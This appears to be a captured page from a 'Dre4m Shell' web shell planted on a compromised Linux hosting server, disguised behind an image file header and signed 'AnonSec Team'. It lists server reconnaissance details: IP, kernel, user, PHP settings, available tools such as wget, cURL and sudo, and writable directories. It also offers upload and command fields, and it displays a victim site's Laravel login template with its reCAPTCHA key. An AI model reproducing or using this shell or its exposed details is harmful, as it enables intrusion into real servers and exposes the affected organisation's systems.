ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.138.102.89
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/fundscopied/resources/views/auth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/fundscopied/resources/views/auth/login.blade.php
@extends('layouts.loginlayout')

@section('content')
<div class="container">
    <div class="row">
        <div class="col-md-8 col-md-offset-2">
            <div class="panel panel-success">
                <div class="panel-heading">Login</div>
                <div class="panel-body">
                
                    <div class="row">
		            <div class="col-md-12"><!--1st col-->
		                @if (count($errors) > 0)
				       <div class="alert alert-danger alert-dismissible" role="alert">
					   <button type="button" class="close" data-dismiss="alert" aria-label="Close">
					   	<span aria-hidden="true">&times;</span>
					   </button>
					   <strong>Error!</strong> 
					   @foreach ($errors->all() as $error)
						<p>{{ $error }}</p>
					   @endforeach
					</div>
		                @endif
				@if(session('message'))
		                    <div class="alert alert-success alert-dismissible" role="alert">
		                        <button type="button" class="close" data-dismiss="alert" aria-label="Close">
		                        	<span aria-hidden="true">&times;</span>
		                        </button>
		                        <strong>Finished!</strong> <br/>
						{{ session('message') }}
					</div>                        
		                @endif
		                @if(session('error'))
		                    <div class="alert alert-danger alert-dismissible" role="alert">
		                        <button type="button" class="close" data-dismiss="alert" aria-label="Close">
		                        	<span aria-hidden="true">&times;</span>
		                        </button>
		                        <strong>Session Expired!</strong> <br/>
						{{ session('error') }}
					</div>                        
		                @endif
		        </div>
	            </div>
            
                    <form class="form-horizontal" role="form" method="POST" action="{{ url('/login') }}" autocomplete="off">
                        {{ csrf_field() }}

                        <div class="form-group{{ $errors->has('username') ? ' has-error' : '' }}">
                            <label for="username" class="col-md-4 control-label">User name </label>

                            <div class="col-md-6">
                                <input id="username" type="username" class="form-control" name="username" value="{{ old('username') }}">

                                @if ($errors->has('username'))
                                    <span class="help-block">
                                        <strong>{{ $errors->first('username') }}</strong>
                                    </span>
                                @endif
                            </div>
                        </div>

                        <div class="form-group{{ $errors->has('password') ? ' has-error' : '' }}">
                            <label for="password" class="col-md-4 control-label">Password</label>

                            <div class="col-md-6">
                                <input id="password" type="password" class="form-control" name="password">

                                @if ($errors->has('password'))
                                    <span class="help-block">
                                        <strong>{{ $errors->first('password') }}</strong>
                                    </span>
                                @endif
                            </div>
                        </div>
                        
                        @if($_SERVER['HTTP_HOST'] == "fundsdemo.nicn.gov.ng")
                            <div class="form-group">
                                <label for="password" class="col-md-4 control-label"></label>
                                <div class="col-md-6">
                                    <div class="g-recaptcha" data-sitekey="{{ '6LeidLcUAAAAACVUckc4hJmT--mLp6ZQMSMfKxOU' }}"></div>
                                    @if ($errors->has('g-recaptcha-response'))
                                        <span style="display: block; color:white;">
                                            <strong>{{ $errors->first('g-recaptcha-response') }}</strong>
                                        </span>
                                    @endif
                                </div>
                            </div>
                        @else
                            <div class="form-group">
                                <label for="password" class="col-md-4 control-label"></label>
                                <div class="col-md-6">
                                    <div class="g-recaptcha" data-sitekey="{{ env('GOOGLE_CAPTCHA_SITE_KEY') }}"></div>
                                    @if ($errors->has('g-recaptcha-response'))
                                        <span style="display: block; color:white;">
                                            <strong>{{ $errors->first('g-recaptcha-response') }}</strong>
                                        </span>
                                    @endif
                                </div>
                            </div>
                        @endif
                        
						
                        <div class="form-group">
                            <div class="col-md-6 col-md-offset-4">
                                <button type="submit" class="btn btn-success">
                                    <i class="fa fa-btn fa-sign-in"></i> Login
                                </button>
								 <!--<a href="{{ url('forget-password') }}" class="text-center new-account">Forgot Password? </a>-->
                            </div>
                        </div>
						
					
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>
@endsection

Anon7 - 2022
AnonSec Team